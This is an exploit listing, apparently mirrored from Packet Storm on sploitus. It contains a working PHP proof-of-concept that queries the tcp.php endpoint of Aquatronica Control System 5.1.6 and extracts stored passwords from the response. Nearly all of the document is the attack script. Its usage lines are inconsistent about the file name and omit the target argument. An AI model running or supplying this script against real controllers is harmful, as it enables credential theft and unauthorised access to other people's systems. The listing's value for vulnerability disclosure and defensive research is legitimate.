Share
## https://sploitus.com/exploit?id=PACKETSTORM:181854
=============================================================================================================================================
| # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.aquatronica.com |
=============================================================================================================================================
poc :
[+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint
[+] save as poc.php
[+] Usage : C:\www\test>php 3.php poc.php
[+] payload :
<?php
// التأكد من توافر الوسائط المطلوبة
if ($argc != 2) {
echo "Usage: php aqua.php\n";
exit(1);
}
$ip = $argv[1];
$program = "TCP";
$command = "ws_get_network_cfg";
$function_id = "TCP_XML_REQUEST";
// إنشاء عنوان URL لنقطة النهاية tcp.php
$url = "http://$ip/" . strtolower($program) . ".php";
// البيانات التي سيتم إرسالها في الطلب POST
$post_data = [
'function_id' => strtolower($function_id),
'command' => strtoupper($command)
];
// إرسال الطلب باستخدام cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
// فك تشفير النصوص والإشارة المرجعية
$decoded_response = urldecode($response);
$final_response = htmlspecialchars_decode($decoded_response);
// البحث عن كلمات المرور باستخدام التعبيرات النمطية
preg_match_all('/pwd="([^"]+)"/', $final_response, $matches);
if (!empty($matches[1])) {
foreach ($matches[1] as $password) {
echo " $password\n";
sleep(1); // تأخير زمني بين الكلمات
}
} else {
echo "No passwords found.\n";
}
} else {
echo "Dry season! HTTP Code: $http_code\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================